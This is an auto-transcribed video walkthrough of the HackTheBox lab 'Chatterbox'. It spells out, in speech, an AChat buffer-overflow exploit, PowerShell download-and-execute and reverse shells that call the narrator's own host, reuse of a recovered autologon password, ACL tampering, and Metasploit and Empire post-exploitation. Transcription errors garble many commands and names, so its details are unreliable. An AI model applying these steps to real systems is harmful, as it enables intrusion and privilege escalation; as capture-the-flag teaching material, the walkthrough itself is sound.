HackTheBox - Chatterbox

what's going on YouTube this is it second we're doing chatterbox from hack the box which is a relatively easy machine so you're probably wondering why this video so long well we're gonna get user three different ways the first way is getting it with the Shang which isn't using Metasploit then we're gonna use Metasploit then we're gonna do PowerShell Empire and then once we get user all three times we're gonna be doing two different professed methods the first method is going to be the intended method which is a auto log-in password that was hard-coded and the second method is through root attacks being owned by Alfred which is the low privilege user so we can issue a command to give ourselves read access files since we own it so yeah that should be fun but let's get into the box a little bit I've got a lot of down votes because it doesn't listen on any of the top 1000 ports so a lot of people thought the box was down you have to do a full port scan to find the ports that a chant listens on which is the application that is exploitable and even if you find it it may still be down because that exploit is a buffer overflow and a lot of unexpected things can happen if you just keep mucking around with it hopefully it's a relatively stable one if you know what you're doing because we're gonna be using that buffer overflow quite a bit and if I have to revert this box a lot I'm going to be relatively upset so let's find out how stable this is and jump in and begin we're gonna start off with the end map so I'm map - SC for default scripts as V enumerate versions Oh a I'll put all formats put in the directory and apple call initial then the IP address of chatterbox which is ten ten ten seventy four this does take some time so I've already ran it looking at the results we see absolutely no ports are listening but the host is online so we know we got the correct IP because I map says the host is up because it did do a ping on 10-10-10 74 when that happens I will do a a map - P - that is all TCP ports 1 thru 65535 and then do - Oh a - output all formats in the end map directory and all ports down end map the IP address is 10 10 10 74 and this command does take some time so I've already ran it looking at the results we do see two ports are open to 9055 and 9000 256 and I will generally always do a and Matt - P - after I did my first scripts can you can do - P - first but I'm lazy and generally like doing things with one command so and if you wanted to you could do - s CSV with a - P - it will just take frickin forever so let us do a and map - P on 9:00 to 5:00 5:00 and 9:00 to 5:00 6:00 the two points that are listening then do - SC - sv o a on and map Allport would you add map targeted on 1010 1074 shouldn't take too long to run I could have added like - end and not do a DNS reverse lookup - t5 to make an aggressive - capital P and to make sure it doesn't do a ping and now it's speeded up a little bit more and that's weird we didn't get any thing back from any ports - both TCP wrapped which doesn't make sense to me something is fishy let's run that again and we'll speed it up this time we should have got something other than TCP wrapped because it means the ports online but it just closed there we go we have one as HTTP one as a chat and we have httpd open we could do also - transcript von to do a volunteer and i've never actually done this one this box I don't know if a map has anything detect that so well that runs let us go over to the IP address 10 10 10 74 and I forgot that has to be 9 - 5 5 and my burp is configured to not intercept so I'm not sure why there I go 10 10 10 74 1955 me just get a complete blank page if we wanted to we could intercept send two repeater Firefox is that too funny there we go and we see the service a chat and then it just closes a 2 or 4 no content we could add things like robots.txt and see if it has files or do a go Buster on it but I don't think we have to do that here the scripts for vulnerabilities didn't find anything but let us just do a search point for a chat since that is the server this generally is like nginx I is Apache but this being a chat is unique so I searched and searched point which is essentially exploit DB just local to Kali and you know what to type a CAPTCHA we see two things come back we got a Metasploit module and a python module so let's do this with Python first so we can do search boy - M for mirror if you do - H you can see everything when we do - am and then exploits windows remote 36 or 25 so it copied that to my directory so let's look at this exploit and see what it does so you give us a MSM venom command to generate some shell code this one is going to spawn calculator then buffer so this is what MSF Adam outputted we see the server address connecting to so let's change this to ten ten ten seventy four the port is nine two five six here it's building the payload this is probably doing something to set up the message because it is an instant message and here's what we're putting the thing from MSM Adam the buffer and it's going to look like it put buf plus a and then times 1 1 5 2 minus the length of the buffer so let's see 1 1 5 2 is probably the maximum payload size that we can have so if this goes beyond 1152 bytes then a buffers too big and the payload crashes so we have to keep a shell code below 1100 bytes and that is about it so let's do a WQ to write because we did change the IP address and I'm gonna grab MSF venom out of 36 or 25 PI and let us see what command we can run so this is doing Windows exec so let's look at other payloads we can do so MSF atom - - list and let's grep for powershell there may be like MSM atom thing that does a reverse PowerShell query to us and while that runs let's copy all this output into a clipboard we do have Windows PowerShell reverse TCP and this is all underscores so this means it is not a staged payload so if this was like PowerShell slash reversed TCP then we have to do exploit handler because it makes it connect back to us then sends it to payload which that executes it sends it to us so let's just do the PowerShell reverse TCP I'm gonna paste what's in my clipboard and then we'll change - P to be Windows PowerShell reverse TCP and CMD is in an argument L host and L port is so l host equals 10 10 14 I were say 30 yep 30 is my IP and then we do L port is equal to 9001 generate the payload and okay that finish quicker than I could explain something I just wanted to say when you see like buffer register equals eax this means that's where the actual jump call should be so once the buffer overflow happens EAX is pointing to the buffer here and you did that in your shellcode I believe if we looked at that three six zero two five and really debugged it it would be doing something and when the buffer flew happens VIX points the memory address at your buffer you also have encoding as you decode and dash B this is a bad character so we don't want to send any of these characters through unfortunately we have 15,000 bytes which is bigger than 1100 so we can't use this payload so what I'm going to do is let us go back to the original one and it's off my clipboard now so we that's not it grab MSF venom 3602 five and instead of doing CMD equals calc dot exe I'm gonna do a PowerShell command so we'll do CMD equals this is gonna be tough tough because we have to do double quotes twice which I hate doing because you have to escape one it always does weirdness so we do PowerShell then I X new object net dot web client download string HTTP 10 10 14 30 slash will do we subscribe dot tip extension doesn't matter when it comes to this and backslash double quote to escape that and then that and I know just because we want to go to a new line and doesn't matter so copy this command and gently I would do like a ping command or something first to make sure the exploit works we're kind of jumping a little bit going straight to PowerShell but wonder if the x-point works by if it hits a web server so while that runs let us up in a new window and let's go to dub dub dub and let's copy nishang so up I think I've been in PowerShell nishang if you don't have this just google github nishang and then download it but let's see we want shells and invoke power should l TC p dot ps1 and it gives us instructions so we just want to do this command whoops I always do DD to put a line in my clipboard or whatever it is in VI and I can just do Peeta put it there's more optimal ways to do it but that's just how I do it IP address is 10 10 14 30 and port would do 9000 and to Jeju 9001 already I don't know if I did let's go back here I don't think I did 9001 9002 there's going to be where shell comes so we can copy this VI on three six zero two five and we want to replace this buffer I'm gonna delete 50 lines with 50 DD and then just get rid of this stuff and then paste I suppose we should change what an MSF atom looks like for documentation purposes okay so let's move invoke PowerShell to please subscribe da tip then we do Python simple HTTP server on port 80 and let's just send that to Payne one and then we can execute this and hope for the best P is not defined we screwed something up go to line 70 while I am length P I have no clue what I screwed up there so let us - m to mirror this again go write it and maybe I delete an extra line oh I deleted all this this create UDP sockets stuff that's my bad so 50 was too much so we'll do 20 to delete 20 lines and then delete the rest so always be careful when deleting stuff how you may delete too much and we have to change that IP again 74 run the exploit we have it hitting please subscribe if it gave us a HTTP 200 and we didn't start netcat that is our bad so let's split the band again netcat LV and be nine thousand two and we'll try this again hey please subscribe we get a connection and we have a PowerShell session so now we could go CD backslash CD let's see Who am I chatterbox Alfred so we go users Alfred desktop and they could do get content user dot txt sub string 0 16 and you just need to get content I do this so you can't see the whole flag and I made an error dir user dot Tex so get content user dot text dot sub string 0 to 16 why powershell well nope there we go not sure what I did the first time but had a weird error message so there's the user flag the very first thing generally I do on a box is either run Sherlock or power up I'm going to do power up so let's go back to a dub dub dub directory and then CP opt do I have it here powersploit then recon Oprah desk power up copy that there and before I do that I'm just gonna do who am i / all and we can see what tokens we have because a lot of previous videos when we did windows boxes we wanted that a se impersonation token and we don't really have any dangerous tokens on this one so let us just do power up so IX new object net web client download string HTTP 10 10 14 30 power up ps1 should be good it got it and notice we didn't get any output right away and that's because unlike when I did the nishang I didn't put a invoke all checks here at the very bottom so all we did was load all the PowerShell functions in a memory and the reason why I did it with the reverse shell is because I didn't want my payload to have to call a command after it downloads this file I'd rather know it downloads the file and execute the file I don't want that second command in between for when I have a shell it doesn't bother me so I'm just gonna do invoke all checks and we'll see what that outputs if you wanted to you could just like grep - i Function i think and power up and see the various functions it has so let's see let's go to the very top give it a capital there we go where's my envelope checks that's where my /all okay well oh here it is here's what our up begins so we have a default password of welcome 1 exclamation point as a registry auto log-in and that is it so let us try that password on other things and because we don't have any ports listening on the box and we didn't use meterpreter so it's a pain in the butt to for a port I'm just going to manually try different users type net users and we can see there are 3 users on the Box administrator alfred and guests so let us try running command as administrator to do that we have to create a credential variable wind is a bit funny and doesn't like you passing passwords in plain text to a command so let's create a variable for a password convert this to a secure string the password was welcome one and i got that from the invoke all checks up here and then we'll do as plain text letting cow show no yes we know this is bad things by putting passwords in plain text but do it anyways and force it to do so then we can do a new variable called cred a new object system management automation I think PS potential and the username will be administrator and the password will be a secure pass variable we do cred we do see that variable it has a username administrator and the password is some secure string so we should be able to do invoke command think - cadential cred script block do Who am I see later Adele I did something wrong does this be in quotes let's see does not like invoke command may be in command requires power shell remoting so let's try start process maybe that'll work start process file path powershell argument list Who am I it won't give us any output so let's just I guess hope for the best see go back here we can search for IX that was weird and we'll copy what we did before and paste it in I think I copied a newline character that's annoying just finished typing @c argument list double quote there HTTP 1010 1430 shells for all ps1 and then we can do that let's go over here we'll move pop-top ps1 to be shells for all ps1 or not power up well copy please subscribe to be shells for all ps1 and edit this and change this port to nine thousand three listener nine thousand three on this command and a show actually completely died so nine thousand two let's get a shell again this or 9003 and copy this and hope for the best this works then we can add in the credential and see if we can do it as a different user position parameter cannot be found that accepts argument oh so it looks like start process doesn't work like I thought it did because argument list is not accepting IX let's see let's just try one last thing want to copy this and then we're not going to do these back slash because I just realized that was completely unnecessary because I'm not needing to escape anything let's try this no error message we got the call and we have a shell do clear mine where Alfred so let's do this again but this time do the credential so we will copy this to a clipboard and then do SEC pass ok and now we got to create the credential looks good miss tape something let's redo this system management PS credential so I type last time illustrator set pass so you cannot find system management PS credential oh I'm so getting automation PowerShell is annoying system management automation yes potential there we go sorry about that ok we can paste the command and this time we can hope that start process a credential flag we start the process with the cred we got a connection and we administrator so now we can go into users administrator desktop and then get content on route text and then we of course want to do a substring of 0 to 16 and there's the first 16 characters of that the funny thing is if we do a Who am I as Alfred and we go to let's see CD users administrator desktop and we can actually get in this directory as Alfred we aren't admin right now and if we tried to get this file get content on route text I'm still doing substring just in case someone left the box in a bad state we we can try to count this file with type and we have permission denied so for some reason we're allowed to access the administrator's home directory as Alfred so we can do is a get a CL and then the directory like administrator I think we piped that to FL which is I want to say full list I figure what FL is but this has all the permissions on it so let's see where are we here we go access to string T Authority system has full control administrators have full control administrator has full control this is the groups and then Alfred has full control if we look at the owner the owner is system so if we go into administrator we can look at the desktop and do the same thing on route text so get a CL route text FL stir see what that is pretty sure it's full text so full length or something let's see that's bothering me now our show what is that shows a lot of weird abbreviations that once you use them you can't just forget about them format list yeah the f means format and then - list that's right so format list and we want to display everything in the list but back to this we get a CL on route text we can see the access to string is only Chatterbox administrator and Alfred is not here like he was on the folders but if we look at the owner how far it actually owns this file so there is a way to do this in PowerShell it is a pain you have to type a lot to do it for something that's relatively simple want to do cackles which is the command like the old way to do it and command prompt so if we just google man cackles we can see how to use them so we're going to use the dash T to search for the path name the data /e for edit ACL and then we probably want to do /p to add a user and permission and we want to do full control so again if we try to view actually will view it this way root text substring 0 16 we can't let us would I copy that that just erased why standard out that sucks I was gonna copy that and we could show that I'm writing the same exact command but you'll just have to trust me I guess what type it yourself so let's do cackles slash T let's specify the file route text slash e edit /p for Commission halfred and we'll give him full and I think we just screwed something up let's cackles route text slash t / e /p Alfred F there we go hundreds before maybe it doesn't like to / - you first yeah I think it just doesn't like the / t first okay but now if we do get a CL on route text and a foul star we can see access to string Alfred has full control so we can do get content route text substring 0 to 16 and view the file that way so there's two different ways we could have done this box and let us just move those permissions so no one else can do it so I think it was let's see we need slash T and then slash R so uh Alfred and we won't root dot txt okay process the file and let's do a get content again we can no longer get that file because we removed Alfred from the ACL so to sum up this box we started off with the end map we saw that the server was a chat we use search point to look for vulnerabilities for a program named a chat we saw one we used we pulled the exploit code then we used MSF venom to generate a exploit shell code for the exploit so could replace in the Python script then we executed the Python script we got a shell as Alfred we solved there was a hard-coded password and he stood up for Alfred so he could order wall get into the box so power up will always display when you have a user that order logs in the password has to be stored in Windows so power up pulled that password and it was the same password as administrator and that gave us access additionally we had a second way in because Alfred had owned the file root text so we could edit the ACLs on it and before we conclude this video we're going to do this box with Metasploit and then potentially do it with Empire so let us restart everything and do this with Empire so exit it's not a pyre Metasploit exit exit there we go and go here and I don't think my first class SQL database has started so I'm going to start that because having the database up speeds up Metasploit a lot when searching for things Oh first dress parody bell then we can just do search a chat and we find the a chat exploit so let's use this show options set our host to be 10 10 10 74 and set L host to be ton 0 1 set L port to be 9001 we run the exploit it should set up a listener and send this payload oh no one Curtis can carry the buffer correctly that's weird show options Oh host 1010 1430 that's correct I'll port 9000 one set L port to be 901 well let's set the payload something payload windows meterpreter reverse HTTP run I'm not sure why that's giving an error message that is odd let's see show Advanced Options and let's see search for encoder they will stage encoding is all false you have no idea why that isn't working I got a swerved it done this before no one cared encoded that is bizarre nine to five six process okay well let us just skip exploiting it like with Metasploit like this and just go straight to unicorn I'm not exactly sure why that's airing so if we haze cute unicorn we can see its usage so let's copy Python unicorn then we can do 10 10 14 30 and we'll do port 9001 it's generating the shell code and while that does that let's set up whoops I don't know what key I hit okay well it finished so let us just move the files so we'll move PowerShell attack into documents HTTP boxes this is Chatterbox and we'll move you know point out our C there as well so let us cat panel attack the PowerShell command to execute a triplet payload with unicorns so let's just move that into dub dub dub please subscribe let me do MSF console - oh you know point OSC let splitter pain go in dub dub dub and then do Python damn simple HTTP server split it again and we can do pice I don't know why I start with T MUX and map that is weird but Python and exit pool execute manual buffer overflow so this is going to trigger the exploit in a chat which is going to go to a Python web server that we have to start on port 80 and then that's going to send it over to Metasploit so sent the exploit we got please subscribe and we didn't get anything over here what's going on with Metasploit oh there we go just took a little bit so session 1 is opened over your sessions - i1 we can interact with it we can do PS and get a list of all the processes but most importantly we can do post exploitation modules so we can search Windows its first windows gather for like information gathering things we can go to the top and then start going down this list so not on intend a bunch of post cadential stuff and windows auto log-in will get a cheat and just use this right off the bat so if we use module auto log-in would use we don't do use module that's a Empire show options we can set the session to 1 which is a meterpreter session if we do sessions we can see that and then run this hopefully it will tell us oh Metasploit is lying to us there's definitely an order login password should always test things search passwords probably a bad one to search for let's see we need your smart hash dump maybe that'll do it we can get lucky here so use what do set G so session is always set to one it's a vision privilege well this sucks windows gathered or a wall gain use good I could have sworn that was the correct one to use let's see laps we don't want so you can tell how much I use Metasploit because this should be something super simple but I don't know so what I'm gonna do is do sessions - I one will do PowerShell and then we will do PowerShell shell and we can just do this exactly like we did before so IX new object net dot web client download string ACB 1010 1430 power up ps1 I don't think I renamed it hopefully I didn't know invoke all checks and we'll get the same exact thing this time we'll do something a little bit different to get the second code execution maybe it may fail on us okay so we can see invoke all checks we found this password so let's exit PowerShell terminate the channel let's see we want to do a port forward command so port forward let's see forward - each show the options we want to do a local port forward I believe so port forward ad - L it's optional no no capital is optional lower case local port - listen on so we do four four five then we want to afford that - point four four five and we want to say that goes to one 27001 right hopefully that's right if we did a shell let's make sure we're listening on port for four or five so net stat - a TCP is listening on four four five so owner Kelly box now if we did a net stat a ONP grab four four five we're listening and Ruby is listening so this is when we connect to this port it's going to send it through meterpreter let's go to whatever - or was so it's going to go to one 27001 after going through meterpreter and then going to the port 4 4 5 so we should be able to background this and search for PS exec and do like let's see use exploit windows SMB PS exec show options set our host to be one 27001 set SMB user administrator set SMB pass welcome one we exploit required to set L host and stuff so L host tun 0 set L port 9000 to run this just start a listener and then try to do a SMB exact through local host on port for four or five so it's authenticating selecting PowerShell as the method of execution and attempted to execute the payload but did not that's weird when exe - H so we want to do - you administrator welcome 1 CMD 27001 login failure so maybe we type the password in wrong that is totally possible welcome one estimation point that should be it no I type that in right let's do what's the host name of this guy see chatterbox still NT login failure administrator welcome one we can't do that as Alfred because he's not an administrator let's see is no run hasn't met Metasploit let's see search run as use nope maybe it's run I'm just Korres there we go first Windows manager on s let's try this one use this show options set CMD Oh that's annoying powershell IX new object web client download string and we'll do what is it 1010 1430 / please subscribe okay well hope that's good set user to administrator set password to welcome one right we for that session domain we need that chatterbox we didn't forget session because we set G it globally set it command ran it hit it I guess whoops handler show options oh there we go session 2 is open that's necessary to get UID and we administrator so I just forgot it takes a little bit to get it running and as I did that I remembered I'd only use and packet PS exec packet - is it W my lick and then we can do let's see target will be and minister put this in single quotes administrator at [Music] administrator : welcome one at local host and whereas acute CMD connection refused let's try PS exact i1 27001 okay so that works I I guess I erased localhost out of my Etsy host file so that would be as administrator and let's try that w my exec again cuz this should've worked nope so you could do it with PS exact might see hers file yeah I don't have localhost here one point seven zero zero one localhost so that's why I couldn't resolve localhost it wasn't in my file so that is how you do the box with Metasploit and I guess we should i do empire so let's shut down and exit again and then we'll do it one last time so if i want to keep that dub-dub-dub they're just drawn that server because we're going to use the same please subscribe type file so it's good an opt Empire see actually let's remove vampire and let's just get a fresh version so github Empire get clone see the Empire and we have to go in to set up install oh it's changing libraries my computer this is gonna take longer than I thought oh my bad I thought I used Empire more recently finally did all the [ __ ] installation was gonna enter to do a random negotiation password and now we just execute Empire should load and we can start off with doing thank yous listener are there's listeners and now we can do use listener and we after hitting space have to use listener you can do tabs and see the different listeners you have I'm gonna do HTTP and then hit tab a few more times we don't have anything so now we can do show options or info show options of Metasploit and we can see the different arguments we have so we have to set the host to be HTTP 10 10 14 30 and we don't want to use port 80 we want to use port 443 I guess because 80 is our simple HTTP server so we don't want to overwrite that we also to change the bind IP it's probably to 10 10 14 30 do info again but with options look like the changed so we can do execute start at port failed because we didn't change set port to be 443 execute and be really nice if when you change the host it changed everything at once but that's not the case so now after we do this we should be able to maybe go stager let's see what options do we have here not there options here one of them was like GU stager there we go you stager and that's not it interact listeners load plugins we could these are a bunch of different stages like if we want to do an HT a file or things like that but one of them was just give us PowerShell let's see listeners creds use listener HTTP launcher launcher when in the actual listener menu and we can do launch a PowerShell to give us the PowerShell command so if we copy this and then we can go to the please subscribe da tip instead of launching the thing that came out of unicorn we pasted the thing that came out of Empire I don't know why I just get exited that now we can just do Python the exploit which is going to make us hit that please subscribe which then has acute Empire so if we do agents we now have an agent we can do interact and you could do all or just specify the agent you want to interact with you do info again to see some stats double tab to see commands you can do but we want to do search module and I think powerup is a module actually so there we go so let's use module oh crap hello let's go back ak use module here use module Oh we do use module I don't think you can do this weird I'm doing something silly it's so to switch between both nothing Metasploit and straight to Empire let's do agents interact use module is a thing and we don't specify power show we just do prevents power up all checks because it's a power shuttle agent so you ignore that very first thing let me do info and see what we can do the agent to run it on is the correct one so we just execute it and we task that agent to run it valid results returned info we should have got the results they interact with again do we get it no don't exit interact ok once we interact with again we get their actual results and we can see same exact thing we've always seen is Alfred and welcome run so let us search module and we'll just search for run to see if we can find one that has like run as so it's risk ghastly run as okay PowerShell management run as so let's use module management run as because PowerShell is assumed with the PowerShell agent do info set username to be administrator administrator yep set domain to be shadow box set password to be welcome one set CMD to be PowerShell and set arguments to be IX new object net web client download string or IP please subscribe da tip make sure we're still listening on HTTP we are if we execute this we can see we got to hit back we got a new agent so if we do agents we have Alfred and administrator and this administrator has this wild good because I believe that is means it's UAC bypassed so it's administrative running in administrative context so that is I guess a quick primer on how to use Empire I did this in the blue video a few months ago so I'd made less mistakes back then you may want to check that video out if you liked Empire but yeah take care guys and I we'll see you next week